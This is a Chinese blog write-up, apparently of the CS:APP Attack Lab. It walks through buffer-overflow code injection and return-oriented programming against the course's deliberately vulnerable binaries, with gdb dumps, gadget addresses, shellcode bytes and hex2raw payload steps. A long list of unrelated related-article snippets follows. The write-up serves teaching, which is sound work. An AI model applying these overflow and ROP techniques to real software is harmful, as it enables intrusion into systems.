Aria461863631
Aria461863631

[CS:APP] Attack Lab

Part 1:缓冲区溢出攻击

Phase 1

[--------------------------code-----------------------]
   0x4017a5:    nop
   0x4017a6:    nop
   0x4017a7:    nop
=> 0x4017a8 :   sub    $0x28,%rsp
   0x4017ac 4>: mov    %rsp,%rdi
   0x4017af 7>: callq  0x401a40 
   0x4017b4 12>:    mov    $0x1,%eax
   0x4017b9 17>:    add    $0x28,%rsp

buf开创0x28 = 40 个字节
随便填充40个字符

Dump of assembler code for function touch1:
   0x00000000004017c0 <+0>: sub    $0x8,%rsp
   0x00000000004017c4 <+4>: movl   $0x1,0x202d0e(%rip)        # 0x6044dc 
   0x00000000004017ce <+14>:    mov    $0x4030c5,%edi
   0x00000000004017d3 <+19>:    callq  0x400cc0 @plt>
   0x00000000004017d8 <+24>:    mov    $0x1,%edi
   0x00000000004017dd <+29>:    callq  0x401c8d 
   0x00000000004017e2 <+34>:    mov    $0x0,%edi
   0x00000000004017e7 <+39>:    callq  0x400e40 @plt>
End of assembler dump.

touch1的地址是0x4017c0
因为是little endian的机器所以将
c0 17 40 00 00 00 00 00
用hex2raw转化为字符,添加到40个a的后面就行了

结果:

[-----------stack--------------]
0000| 0x5561dc78 ('a' <repeats 40 times>, "\300\027@")
0008| 0x5561dc80 ('a' <repeats 32 times>, "\300\027@")
0016| 0x5561dc88 ('a' <repeats 24 times>, "\300\027@")
0024| 0x5561dc90 ('a' <repeats 16 times>, "\300\027@")
0032| 0x5561dc98 ("aaaaaaaa\300\027@")
0040| 0x5561dca0 --> 0x4017c0 (<touch1>:    sub    $0x8,%rsp)
0048| 0x5561dca8 --> 0x0 
0056| 0x5561dcb0 --> 0x401f24 (<launch+112>:    cmpl   $0x0,0x2025bd(%rip)        # 0x6044e8 )

Phase 2

touch2 有参数传递,要改变寄存器rdi里存放的值

结果:

[---------------------stack---------------------------]
0000| 0x5561dc78 ('a' 40 times>, "\260\334aU")
0008| 0x5561dc80 ('a' 32 times>, "\260\334aU")
0016| 0x5561dc88 ('a' 24 times>, "\260\334aU")
0024| 0x5561dc90 ('a' 16 times>, "\260\334aU")
0032| 0x5561dc98 ("aaaaaaaa\260\334aU")
0040| 0x5561dca0 --> 0x5561dcb0 --> 0xc359b997fac7c748 
0048| 0x5561dca8 --> 0x4017ec (:    sub    $0x8,%rsp)
0056| 0x5561dcb0 --> 0xc359b997fac7c748

依旧是40个a,接着是把返回的地址改为调用0x5561dcb0(修改寄存器的代码),修改0x5561dca8的值为调用touch2,修改0x5561dcb0的值为调用添加的代码code
栈的指针指向0040调用完code之后,刚好向下移动到0048调用touch2

code代码:

mov $0x59b997fa,%rdi
ret

编译:

gcc -c code.s
objdump -d code.o > code.d
./hex2raw  -i code.d > code.r

看到网上的码还有一步pushq $0x004017ec (touch2的地址)
结果:
ret时返回到0x5561dc78(%rsp的地址?)执行注入的代码,然后直接调用touch2了

[-----------------------stack-------------------------]
0000| 0x5561dc78 --> 0x6859b997fac7c748 
0008| 0x5561dc80 --> 0x303030c3004017ec 
0016| 0x5561dc88 ('0' 24 times>, "x\334aU")
0024| 0x5561dc90 ('0' 16 times>, "x\334aU")
0032| 0x5561dc98 ("00000000x\334aU")
0040| 0x5561dca0 --> 0x5561dc78 --> 0x6859b997fac7c748 
0048| 0x5561dca8 --> 0x0 
0056| 0x5561dcb0 --> 0x401f24 (112>:    cmpl   $0x0,0x2025bd(%rip)        # 0x6044e8 )

Phase 3

touch3参数是string
将str存到0x5561dcb8的地址上
code将str拷贝到%rdi
调用同上

[-----------------------stack-------------------------]
0000| 0x5561dc78 ('a' )
0008| 0x5561dc80 ('a' )
0016| 0x5561dc88 ('a' )
0024| 0x5561dc90 ('a' )
0032| 0x5561dc98 ("aaaaaaaa")
0040| 0x5561dca0 --> 0x401900 (6>:  (bad))
0048| 0x5561dca8 --> 0x9 ('\t')
0056| 0x5561dcb0 --> 0x401f24 (112>:    )

str是cookie的地址值用ascii转为字符串
(0x)59b997fa
对应35 39 62 39 39 37 66 61 00(字符串后面补空字符’\0’)

code代码:

mov $0x5561dcb8,%rdi
ret

Part2: ROP

Phase 4

看了看文档,解释的很清楚w
利用已经有的代码片段gadget,通过汇编的解释,来调用自己想要执行的程序

第一个程序还是调用touch2
要将cookiee放入rdi之中
但pop %rdi(5f)的指令很少出现
所以转换为

popq %rax
movq %rax %rdi
ret

根据表里的编码
popq %rax的编码是58
movq %rax %rdi的编码是48 89 c7

在rtarget.d里找到这两个代码片段

gadget1
00000000004019a7 :
  4019a7:   8d 87 51 73 58 90       lea    -0x6fa78caf(%rdi),%eax
  4019ad:   c3                      retq

地址为0x4019ab

gadget2
00000000004019a0 :
  4019a0:   8d 87 48 89 c7 c3       lea    -0x3c3876b8(%rdi),%eax
  4019a6:   c3                      retq  

00000000004019ae :
  4019ae:   c7 07 48 89 c7 c7       movl   $0xc7c78948,(%rdi)
  4019b4:   c3                      retq

273的地址是0x4019a2

转化为little endian的形式然后就是合并,转换为字符串注入

cat offeset gadget1 cookiee gadget2 touch2 > code
./hex2raw -i code > code.r

然后就成功了

[---------------stack----------------------]
0000| 0x7ffffffee8a0 ('a' <repeats 40 times>, "\253\031@")
0008| 0x7ffffffee8a8 ('a' <repeats 32 times>, "\253\031@")
0016| 0x7ffffffee8b0 ('a' <repeats 24 times>, "\253\031@")
0024| 0x7ffffffee8b8 ('a' <repeats 16 times>, "\253\031@")
0032| 0x7ffffffee8c0 ("aaaaaaaa\253\031@")
0040| 0x7ffffffee8c8 --> 0x4019ab (<addval_219+4>:  pop    %rax)
0048| 0x7ffffffee8d0 --> 0x59b997fa 
0056| 0x7ffffffee8d8 --> 0x4019a2 (<addval_273+2>:  mov    %rax,%rdi)
0064| 0x7ffffffee8e0 --> 0x4017ec (<touch2>:    sub    $0x8,%rsp)

一开始试了237,但不知道为什么这个返回的时候返回到了别的函数导致segmentation fault

你可能感兴趣的:(汇编)

  • 工控网络安全学习路线 206333308 安全
    一、基础技能编程语言:从汇编语言开始学习,了解底层机器指令和内存管理等基础知识。接着学习C/C++,掌握面向过程和面向对象编程的基本概念和技术,为后续的漏洞挖掘和底层分析打下基础。最后学习Python,它在安全领域应用广泛,可用于自动化脚本编写、漏洞扫描和数据分析等。《计算机网络原理》:掌握网络通信的基本原理,包括OSI七层模型、TCP/IP协议栈、IP地址分配、子网掩码等。了解网络拓扑结构、路由
  • 从0开始的操作系统手搓教程 附二——调试我们的操作系统(bochs调试小记) charlie114514191 从0开始的操作系统教程操作系统计算机架构bochs调试
    目录我们可以调试OS的什么理解bochs调试的单位内存尺度查看内存内容disasm作为反汇编指令查看我们正在执行的内容打断点showint查看中断info其他指令我们当然要学习如何使用bochs来调试我们的操作系统。毕竟伴随代码量的增大,出错的概率自然也会直线的上升。我们可以调试OS的什么我们可以查看页表,查看GDT,IDT等后面我们编写操作系统会使用到的数据结构可以看到当前线程流的栈的数据可以反
  • C++栈内存管理:从原理到高性能编程实践 溟海. c++c++开发语言
    以下是一篇关于C++栈机制的原创技术论文框架及内容,结合语言规范、编译器实现与工程实践,包含创新性分析和实验验证:---**C++栈内存管理:从原理到高性能编程实践****摘要**本文深入剖析C++栈内存的分配机制、生命周期管理及优化策略。通过反汇编分析GCC/Clang编译器实现,验证栈帧结构与函数调用约定,提出基于现代C++特性的栈使用优化方案。实验证明,合理控制栈空间可降低30%内存访问延迟
  • C语言--指针(三) weixin_51790712 c语言开发语言
    预处理#includehello.cgcchello.c//编译预处理(预编译)汇编(汇编语言)---助记符编程:人类语言--->编程语言(C语言)---汇编语言--->机器语言(01010)八位的单片机01010101//加法//0101010116位32位01010101010101010101010101010101//add64位main(){inta=1;intb=2;printf("h
  • 深入掌握Smali语法:Android逆向工程的核心 小宇python app逆向android
    深入掌握Smali语法:Android逆向工程的核心在Android逆向工程和应用开发中,Smali语法扮演着至关重要的角色。Smali是一种基于寄存器的汇编语言,用于表示Dalvik字节码,即Android应用的中间代码。本文将详细介绍Smali语法的基础知识、结构和关键概念,帮助你在Android逆向工程中游刃有余。1.Smali语法概述Smali语法是Android平台上Dex文件的文本表示
  • 嵌入式编译工具链比较 JNI_42020487 编译工具
    在嵌入式开发中,编译工具链是开发过程中非常重要的一部分,它包含了一系列用于代码编译、调试、链接和打包的工具。一个完整的嵌入式编译工具链通常包括编译器、汇编器、链接器、调试器等。下面是常见的嵌入式编译工具链及相关工具:1.GCC(GNUCompilerCollection)GCC是最常用的开源编译器集合,广泛应用于嵌入式开发。GCC支持多种处理器架构,包括ARM、AVR、MIPS、RISC-V等,因
  • ARM常用汇编语法 sjxpf922 ARMarm
    指令格式操作指令目的操作数源操作数1、MOV指令MOVR0,R1//@表示寄存器R1的数据拷贝给R0寄存器MOVR0,#0x10//@表示将立即数0x10赋值给寄存器R0//注:立即数指的是在立即寻址方式指令中给出的源操作数(言外之意就是可以直接使用的),类似于常量,不能作为被赋值的量使用。//立即数的优点:取指的时候可以直接访问,不用单独去内存读取,速度快//立即数的缺点:不能是任意的32位数字
  • x86汇编基础(AT&T语法) HugoVus Windows
    以下面这段简单的汇编代码为例.section.data.section.text.globl_start_start:movl$1,%eaxmovl$4,%ebxint$0x80(注意是globl不是global;movl(MOVL)不是mov1(MOV一))将这段程序保存为demo.s,然后用汇编器as把汇编程序中的助记符翻译成机器指令(汇编指令与机器指令是对应的)生成目标文件demo.o。然后
  • 汇编简介&常用语法 官子无敌刘小路 汇编
    为什么要有汇编因为Cortex-A芯片一上电SP指针还没初始化,C环境还没准备好,所以肯定不能运行C代码,必须先用汇编语言设置好C环境,比如初始化DDR、设置SP指针等等,当汇编把C环境设置好了以后才可以运行C代码GNU语法如果大家使用过STM32的话就会知道MDK和IAR下的启动文件startup_stm32f10x_hd.s其中的汇编语法是有所不同的,将MDK下的汇编文件直接复制到IAR下去编
  • win32汇编环境,对线程的创建与操作示例二 一品人家 汇编
    ;运行效果;win32汇编环境,对线程的创建与操作示例二;本文主要是实现用CreateThread创建线程时,如何把参数传入进去;以下举3个例子说明,如何把数值、字符串和自定义结构传入线程之中;下面为asm文件;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>.386.modelflat,stdcallopti
  • win32汇编环境,窗口程序使用跟踪条(滑块)控件示例一 一品人家 汇编
    ;运行效果;win32汇编环境,窗口程序使用跟踪条(滑块)控件示例一;生成2条横的跟踪条,分别设置不同的数值范围,设置不同的进度副度的例子;直接抄进RadAsm可编译运行。重要部分加备注。;下面为asm文件;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>.386.modelflat,stdcalloption
  • Windows逆向工程入门之汇编数据存储\宽度,内存地址及边界,数据截断处理 0xCC说逆向 汇编windowsc++WIN32c语言逆向安全
    公开视频->链接点击跳转公开课程博客首页->链接点击跳转博客主页目录一、汇编数据存储宽度1.常见的数据存储宽度2.数据存储宽度在汇编中的应用3.数据存储宽度的意义二、汇编中的内存地址与边界对齐1.内存地址示例:2.数据对齐3.数据对齐在汇编中的体现正确对齐错误对齐汇编代码示例三、汇编中的数据宽度截断1.数据截断的影响示例:2.数据宽度截断在赋值和运算中的体现汇编代码:数据截断溢出示例:四、技术扩展
  • C语言---预处理 weixin_51790712 c语言开发语言
    预处理#includehello.cgcchello.c//编译预处理(预编译)汇编(汇编语言)---助记符编程:人类语言--->编程语言(C语言)---汇编语言--->机器语言(01010)八位的单片机01010101//加法//0101010116位32位01010101010101010101010101010101//add64位main(){inta=1;intb=2;printf("h
  • ARM下的对齐处理 tanghuajie ARM下的对齐处理ARM下的对齐处理
    fromDUI0067D_ADS1_2_CompLib3.13typequlifiers有部分摘自ARM编译器文档对齐部分对齐的使用:1.__align(num)这个用于修改最高级别对象的字节边界。在汇编中使用LDRD或者STRD时就要用到此命令__align(8)进行修饰限制,来保证数据对象是相应对齐。这个修饰对象的命令最大是8个字节限制,可以让2字节的对象进行4字节对齐,但是不能让4字节的对象
  • stm32编译过程剖析 MicroPython openmv运行逻辑分析 MicroPython和传统c语言编译的比较 头脑风暴 广药门徒 单片机
    首先来讲讲机器码,任何编译手段到最后烧录应用于芯片处理器的都是机器码比如在某个架构下,二进制码0x33448899677代表的是str,也就是汇编里面的写入操作,然后他后面的一个参数是我要写入的地址也是二进制码,然后还有一个是他要写入的值也是二定制,而这个0x334488996677代表的实际芯片执行的底层操作就是写入,这就是机器码,你可以理解成机器码就是一张表指示出什么样的二进制对应什么样的操作
  • win32汇编环境,窗口程序中自定义工具栏的使用示例四 一品人家 汇编
    ;运行效果;win32汇编环境,窗口程序中自定义工具栏的使用示例四;这次是竖着放右侧的。以下为生成48*48大小的自定义工具栏图标,自已设计图标样式,显得更专业点。;原理是,先生成工具栏控件,再生成图像列表,然后弄几个图标加入图像列表,再把图像列表与工具栏控件关联。需留意所需图标的规格,下例中为128*128像素,位深度为32位,这样的清晰度高点。;直接抄进RadAsm可编译运行。重要部分加备注。
  • C/C++嵌入式面试题 残念惭忆 面试题c语言c++开发语言
    目录C面试题Linux系统编程网络编程C++STLQT数据库BS开发C面试题1、描述⼀下gcc的编译过程?gcc编译过程分为4个阶段:预处理、编译、汇编、链接。预处理:头⽂件包含、宏替换、条件编译、删除注释编译:主要进⾏词法、语法、语义分析等,检查⽆误后将预处理好的⽂件编译成汇编⽂件。汇编:将汇编⽂件转换成⼆进制⽬标⽂件链接:将项⽬中的各个⼆进制⽂件+所需的库+启动代码链接成可执⾏⽂件2、内存的最
  • 函数栈帧的创建和销毁讲解 Morning_Yang丶 c语言开发语言后端
    文章目录本章主题:1.什么是函数栈帧2.理解函数栈帧能解决什么问题呢?3.函数栈帧的创建和销毁解析3.1什么是栈?3.2认识相关寄存器和汇编指令相关寄存器相关汇编命令3.3解析函数栈帧的创建和销毁3.3.1预备知识3.3.2函数的调用堆栈3.3.4准备环境3.3.5转到反汇编3.3.6函数栈帧的创建3.3.7函数栈帧的销毁总结本章主题:什么是函数栈帧?理解函数栈帧能解决什么问题?函数栈帧的创建和销
  • APK反编译破解方法与加密措施 gdky005 Android破解加密汇编代码分析工具android
    所谓APK指的是Android操作系统的应用程序安装文件。所谓Crack,简单地理解为“破解”。我具体指的是反编译APK文件进行汇编级的代码分析,并修改或插入自己的代码,重新签名打包为APK文件,以达到改变程序原有行为的目的。由以上的说明可知,我们要Crack一个APK文件,主要流程有三步:反编译、代码分析、重新打包签名。基本准备我们需要一些基本的工具进行一些主要的工作。如果你是一个会做Andro
  • C/C++调试---汇编2 麦兜c 调试c语言c++汇编
    汇编2分析优化后的代码掌握了汇编的基本知识后,我们继续来解决前面提到的两个问题:1、如何在函数中找到局部变量和参数2、如何将指令映射到源代码行。在栈内存中分配的局部变量和参数很容易找到,因为只要函数没有返回,它们通常就不会被破坏。然而,读取分配在寄存器中的局部变量和参数的正确值会比较有挑战,因为它们可能会在某些地方被临时保存、占用,然后恢复,这在优化的代码中相当常见。当调试器在这种情况下无法提供帮
  • mov 及常见指令;汇编分析指针、引用、is-else schedule___ 汇编语言
    movmovdest,src将src的内容赋值给dest[]中括号内放的为内存地址word(2字节)、dword(4字节)、qword(8字节quadword)a的地址:008FF918h[ebp-8]:8FF920h-8h=a的地址ptr为固定写法Q&AQ:为什么不直接用a的地址A:这种寻址方式更灵活,程序每次加载到内存的地址不是固定的。变量的地址CPU大部分是小端模式。高存高,低存低(高地址存
  • 汇编语言 0x64 schedule___ 汇编语言
    汇编语言种类8086汇编(16bit)x86汇编(32bit)x64汇编(64bit)ARM汇编x64汇编,根据编译器的不同有两种书写格式IntelAT&T项目AT&TIntel说明寄存器名%eaxeaxIntel不带%操作数顺序movl%eax,%edxmovedx,eax将eax的值赋值给edx立即数movl$3,%eaxmovl$0x10,%eaxmoveax,3moveax,0x10将3的
  • 将寄存器清零的指令c语言,将 CX 寄存器低 4 位清零的正确指令是() 。 不爱说话的我 将寄存器清零的指令c语言
    相关题目与解析将CX寄存器低四位清零其它位不变的正确指令是()A.ANDCX,OFOHB.ANDCX,OFFFOHC.ANDCX,1110HD.若要使寄存器AL中的高4位不变,低4位为0,所用指令为()。A.ANDAL,0FHB.ANDAL,F0HC.ORAL,0FHD将R1寄存器中的指定位bit0和bit3清零,以下ARM汇编指令正确的是()。A.ANDR1,R1,0xFFFFFFF6B.BIC
  • 反汇编代码里的地址 链接地址 运行地址 存储地址 位置无关码 位置有关码 Mapleay uboot运行环境编译环境代码反汇编地址链接地址下载地址代码重定位运行地址
    反汇编代码地址就是链接地址;链接地址不一定等于运行地址(通常链接地址和运行地址的值是一样的);运行地址是在统一编址的存储区间中,正在运行的代码所处的地址;存储地址是也就是代码被下载到物理介质上的地址。位置无关码的代码中没有绝对地址的不连续跳转,反之就是位置相关码;代码重定位的判断本质是依赖与PC寄存器实现。具体是PC值的相对位置固定,可以锁定两个相对位置:相对PC锁定运行时代码的首地址和相对PC锁
  • Java语言基础 浅塘锦鲤 java开发语言
    一、Java概述1.简介计算机语言人与计算机之间通信的语言,它主要由一些指令组成,这些指令包括数字、符号和语法等内容,程序员可以通过这些指令指挥计算机进行工作。计算机语言的种类可以分成机器语言、汇编语言、高级语言三大类。机器语言都是由二进制的0和1组成的编码汇编语言采用了英文缩写的标识符高级语言采用接近于人类的自然语言进行编程。2.Java历史大事件1995年5月23日,在Oak更名为Java后,
  • 详解FreeRTOS:FreeRTOS程序启动流程(基础篇—5) 不脱发的程序猿 详解FreeRTOSFreeRTOS程序启动流程FreeRTOS嵌入式RTOS
    裸机系统上电时第一个执行的是启动文件里由汇编编写的复位函数Reset_Handler,复位函数最后会调用C库函数__main,__main函数的主要工作是初始化系统的堆和栈,最后调用C中的main函数。如下图所示:1、创建任务在main()函数中,我们直接可以对FreeRTOS进行创建任务操作,因为FreeRTOS会自动帮我们做初始化事情,比如初始化堆内存。我们在main()函数中直接初始化板级外
  • STM32单片机学习记录(12.27) 宣宣猪的小花园. STM32stm32无人机嵌入式硬件单片机
    一、STM328.2-DMA数据转运1.关于寄存器汇编(1)寄存器实际地址=起始地址+偏移;(2)可使用结构体访问寄存器(使用结构体依次占用地址,再用函数调取地址)。2.配置DMA:(1)定义DMA转运的源端数组(uint8_tDataA[]:0x0_;uint8_tDataB[]:全局默认为0)和目的数组;(2)初始化DMA,将DataA的数据转运到DataB;(3)配置主函数。3.初始化DMA
  • 2025年1月文章一览 python
    2025年1月编程人总共更新了27篇文章:1.2024年12月文章一览2.《计算机组成及汇编语言原理》阅读笔记:p177-p1773.《计算机组成及汇编语言原理》阅读笔记:p178-p1994.《计算机组成及汇编语言原理》阅读笔记:p200-p2405.《计算机组成及汇编语言原理》读后感6.《CPythonInternals》阅读笔记:p1-p197.《CPythonInternals》阅读笔记:
  • win32汇编环境,窗口程序生成选项卡(属性页\标签)控件及运用 一品人家 汇编
    ;运行效果;win32汇编环境,窗口程序生成选项卡(属性页\标签)控件及运用;主要是生成1个选项卡,同时准备好几个对话框,然后将对话框叠加到选项卡控件里面,在运行时点击哪一项时则显示对应的对话框。;以下示例显示3个项的选项卡控件;直接抄进RadAsm可编译运行。重要部分加备注。;下面为asm文件;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
  • volatile、ThreadLocal的使用场景和原理 WilldasK javajvm开发语言
    1.volatile适用场景(1)概念java编程语言允许线程访问共享变量,为了确保共享变量能被准确和一致的更新,线程应该确保通过排他锁单独获得这个变量。Java语言提供了volatile,在某些情况下比锁更加方便。如果一个字段被声明成volatile,java线程内存模型确保所有线程看到这个变量的值是一致的。(2)原理有volatile变量修饰的共享变量进行写操作的时候会多第二行汇编代码,通过查
  • 多线程编程之存钱与取钱 周凡杨 javathread多线程存钱取钱
      生活费问题是这样的:学生每月都需要生活费,家长一次预存一段时间的生活费,家长和学生使用统一的一个帐号,在学生每次取帐号中一部分钱,直到帐号中没钱时 通知家长存钱,而家长看到帐户还有钱则不存钱,直到帐户没钱时才存钱。   问题分析:首先问题中有三个实体,学生、家长、银行账户,所以设计程序时就要设计三个类。其中银行账户只有一个,学生和家长操作的是同一个银行账户,学生的行为是
  • java中数组与List相互转换的方法 征客丶 JavaScriptjavajsonp
    1.List转换成为数组。(这里的List是实体是ArrayList)   调用ArrayList的toArray方法。   toArray   public T[] toArray(T[] a)返回一个按照正确的顺序包含此列表中所有元素的数组;返回数组的运行时类型就是指定数组的运行时类型。如果列表能放入指定的数组,则返回放入此列表元素的数组。否则,将根据指定数组的运行时类型和此列表的大小分
  • Shell 流程控制 daizj 流程控制if elsewhilecaseshell
    Shell 流程控制 和Java、PHP等语言不一样,sh的流程控制不可为空,如(以下为PHP流程控制写法): <?php if(isset($_GET["q"])){ search(q);}else{// 不做任何事情} 在sh/bash里可不能这么写,如果else分支没有语句执行,就不要写这个else,就像这样 if else if if 语句语
  • Linux服务器新手操作之二 周凡杨 Linux 简单 操作
    1.利用关键字搜寻Man Pages    man -k keyword  其中-k 是选项,keyword是要搜寻的关键字 如果现在想使用whoami命令,但是只记住了前3个字符who,就可以使用 man -k who来搜寻关键字who的man命令       [haself@HA5-DZ26 ~]$ man -k
  • socket聊天室之服务器搭建 朱辉辉33 socket
    因为我们做的是聊天室,所以会有多个客户端,每个客户端我们用一个线程去实现,通过搭建一个服务器来实现从每个客户端来读取信息和发送信息。    我们先写客户端的线程。 public class ChatSocket extends Thread{ Socket socket; public ChatSocket(Socket socket){ this.sock
  • 利用finereport建设保险公司决策分析系统的思路和方法 老A不折腾 finereport金融保险分析系统报表系统项目开发
    决策分析系统呈现的是数据页面,也就是俗称的报表,报表与报表间、数据与数据间都按照一定的逻辑设定,是业务人员查看、分析数据的平台,更是辅助领导们运营决策的平台。底层数据决定上层分析,所以建设决策分析系统一般包括数据层处理(数据仓库建设)。   项目背景介绍 通常,保险公司信息化程度很高,基本上都有业务处理系统(像集团业务处理系统、老业务处理系统、个人代理人系统等)、数据服务系统(通过
  • 始终要页面在ifream的最顶层 林鹤霄
    index.jsp中有ifream,但是session消失后要让login.jsp始终显示到ifream的最顶层。。。始终没搞定,后来反复琢磨之后,得到了解决办法,在这儿给大家分享下。。 index.jsp--->主要是加了颜色的那一句 <html> <iframe name="top" ></iframe> <ifram
  • MySQL binlog恢复数据 aigo mysql
    1,先确保my.ini已经配置了binlog:   # binlog log_bin = D:/mysql-5.6.21-winx64/log/binlog/mysql-bin.log log_bin_index = D:/mysql-5.6.21-winx64/log/binlog/mysql-bin.index log_error = D:/mysql-5.6.21-win
  • OCX打成CBA包并实现自动安装与自动升级 alxw4616 ocxcab
    近来手上有个项目,需要使用ocx控件 (ocx是什么? http://baike.baidu.com/view/393671.htm) 在生产过程中我遇到了如下问题. 1. 如何让 ocx 自动安装?     a) 如何签名?     b) 如何打包?     c) 如何安装到指定目录? 2.
  • Hashmap队列和PriorityQueue队列的应用 百合不是茶 Hashmap队列PriorityQueue队列
      HashMap队列已经是学过了的,但是最近在用的时候不是很熟悉,刚刚重新看以一次,   HashMap是K,v键 ,值     put()添加元素      //下面试HashMap去掉重复的 package com.hashMapandPriorityQueue; import java.util.H
  • JDK1.5 returnvalue实例 bijian1013 javathreadjava多线程returnvalue
    Callable接口: 返回结果并且可能抛出异常的任务。实现者定义了一个不带任何参数的叫做 call 的方法。 Callable 接口类似于 Runnable,两者都是为那些其实例可能被另一个线程执行的类设计的。但是 Runnable 不会返回结果,并且无法抛出经过检查的异常。        ExecutorService接口方
  • angularjs指令中动态编译的方法(适用于有异步请求的情况) 内嵌指令无效 bijian1013 JavaScriptAngularJS
            在directive的link中有一个$http请求,当请求完成后根据返回的值动态做element.append('......');这个操作,能显示没问题,可问题是我动态组的HTML里面有ng-click,发现显示出来的内容根本不执行ng-click绑定的方法!     
  • 【Java范型二】Java范型详解之extend限定范型参数的类型 bit1129 extend
    在第一篇中,定义范型类时,使用如下的方式:   public class Generics<M, S, N> { //M,S,N是范型参数 }  这种方式定义的范型类有两个基本的问题:   1. 范型参数定义的实例字段,如private M m = null;由于M的类型在运行时才能确定,那么我们在类的方法中,无法使用m,这跟定义pri
  • 【HBase十三】HBase知识点总结 bit1129 hbase
    1. 数据从MemStore flush到磁盘的触发条件有哪些?    a.显式调用flush,比如flush 'mytable'    b.MemStore中的数据容量超过flush的指定容量,hbase.hregion.memstore.flush.size,默认值是64M 2. Region的构成是怎么样? 1个Region由若干个Store组成
  • 服务器被DDOS攻击防御的SHELL脚本 ronin47
    mkdir /root/bin vi /root/bin/dropip.sh #!/bin/bash/bin/netstat -na|grep ESTABLISHED|awk ‘{print $5}’|awk -F:‘{print $1}’|sort|uniq -c|sort -rn|head -10|grep -v -E ’192.168|127.0′|awk ‘{if($2!=null&a
  • java程序员生存手册-craps 游戏-一个简单的游戏 bylijinnan java
    import java.util.Random; public class CrapsGame { /** * *一个简单的赌*博游戏,游戏规则如下: *玩家掷两个骰子,点数为1到6,如果第一次点数和为7或11,则玩家胜, *如果点数和为2、3或12,则玩家输, *如果和为其它点数,则记录第一次的点数和,然后继续掷骰,直至点数和等于第一次掷出的点
  • TOMCAT启动提示NB: JAVA_HOME should point to a JDK not a JRE解决 开窍的石头 JAVA_HOME
    当tomcat是解压的时候,用eclipse启动正常,点击startup.bat的时候启动报错; 报错如下:   The JAVA_HOME environment variable is not defined correctly This environment variable is needed to run this program NB: JAVA_HOME shou
  • [操作系统内核]操作系统与互联网 comsci 操作系统
         我首先申明:我这里所说的问题并不是针对哪个厂商的,仅仅是描述我对操作系统技术的一些看法       操作系统是一种与硬件层关系非常密切的系统软件,按理说,这种系统软件应该是由设计CPU和硬件板卡的厂商开发的,和软件公司没有直接的关系,也就是说,操作系统应该由做硬件的厂商来设计和开发
  • 富文本框ckeditor_4.4.7 文本框的简单使用 支持IE11 cuityang 富文本框
    <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <title>知识库内容编辑</tit
  • Property null not found darrenzhu datagridFlexAdvancedpropery null
    When you got error message like "Property null not found ***", try to fix it by the following way: 1)if you are using AdvancedDatagrid, make sure you only update the data in the data prov
  • MySQl数据库字符串替换函数使用 dcj3sjt126com mysql函数替换
    需求:需要将数据表中一个字段的值里面的所有的  .   替换成  _   原来的数据是  site.title  site.keywords  .... 替换后要为     site_title  site_keywords   使用的SQL语句如下:   updat
  • mac上终端起动MySQL的方法 dcj3sjt126com mysqlmac
    首先去官网下载: http://www.mysql.com/downloads/ 我下载了5.6.11的dmg然后安装,安装完成之后..如果要用终端去玩SQL.那么一开始要输入很长的:/usr/local/mysql/bin/mysql 这不方便啊,好想像windows下的cmd里面一样输入mysql -uroot -p1这样...上网查了下..可以实现滴. 打开终端,输入: 1
  • Gson使用一(Gson) eksliang jsongson
    转载请出自出处:http://eksliang.iteye.com/blog/2175401 一.概述 从结构上看Json,所有的数据(data)最终都可以分解成三种类型: 第一种类型是标量(scalar),也就是一个单独的字符串(string)或数字(numbers),比如"ickes"这个字符串。 第二种类型是序列(sequence),又叫做数组(array)
  • android点滴4 gundumw100 android
    Android 47个小知识 http://www.open-open.com/lib/view/open1422676091314.html Android实用代码七段(一) http://www.cnblogs.com/over140/archive/2012/09/26/2611999.html http://www.cnblogs.com/over140/arch
  • JavaWeb之JSP基本语法 ihuning javaweb
      目录   JSP模版元素  JSP表达式  JSP脚本片断  EL表达式  JSP注释  特殊字符序列的转义处理  如何查找JSP页面中的错误   JSP模版元素    JSP页面中的静态HTML内容称之为JSP模版元素,在静态的HTML内容之中可以嵌套JSP
  • App Extension编程指南(iOS8/OS X v10.10)中文版 啸笑天 ext
             当iOS 8.0和OS X v10.10发布后,一个全新的概念出现在我们眼前,那就是应用扩展。顾名思义,应用扩展允许开发者扩展应用的自定义功能和内容,能够让用户在使用其他app时使用该项功能。你可以开发一个应用扩展来执行某些特定的任务,用户使用该扩展后就可以在多个上下文环境中执行该任务。比如说,你提供了一个能让用户把内容分
  • SQLServer实现无限级树结构 macroli oraclesqlSQL Server
    表结构如下: 数据库id path titlesort 排序 1 0 首页 0 2 0,1 新闻 1 3 0,2 JAVA 2 4 0,3 JSP 3 5 0,2,3 业界动态 2 6 0,2,3 国内新闻 1 创建一个存储过程来实现,如果要在页面上使用可以设置一个返回变量将至传过去   create procedure test as begin decla
  • Css居中div,Css居中img,Css居中文本,Css垂直居中div qiaolevip 众观千象学习永无止境每天进步一点点css
    /**********Css居中Div**********/ div.center { width: 100px; margin: 0 auto; } /**********Css居中img**********/ img.center { display: block; margin-left: auto; margin-right: auto; }
  • Oracle 常用操作(实用) 吃猫的鱼 oracle
    SQL>select text from all_source where owner=user and name=upper('&plsql_name');  SQL>select * from user_ind_columns where index_name=upper('&index_name');  将表记录恢复到指定时间段以前
  • iOS中使用RSA对数据进行加密解密 witcheryne iosrsaiPhoneobjective c
      RSA算法是一种非对称加密算法,常被用于加密数据传输.如果配合上数字摘要算法, 也可以用于文件签名. 本文将讨论如何在iOS中使用RSA传输加密数据. 本文环境 mac os  openssl-1.0.1j, openssl需要使用1.x版本, 推荐使用[homebrew](http://brew.sh/)安装. Java 8 RSA基本原理 RS
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他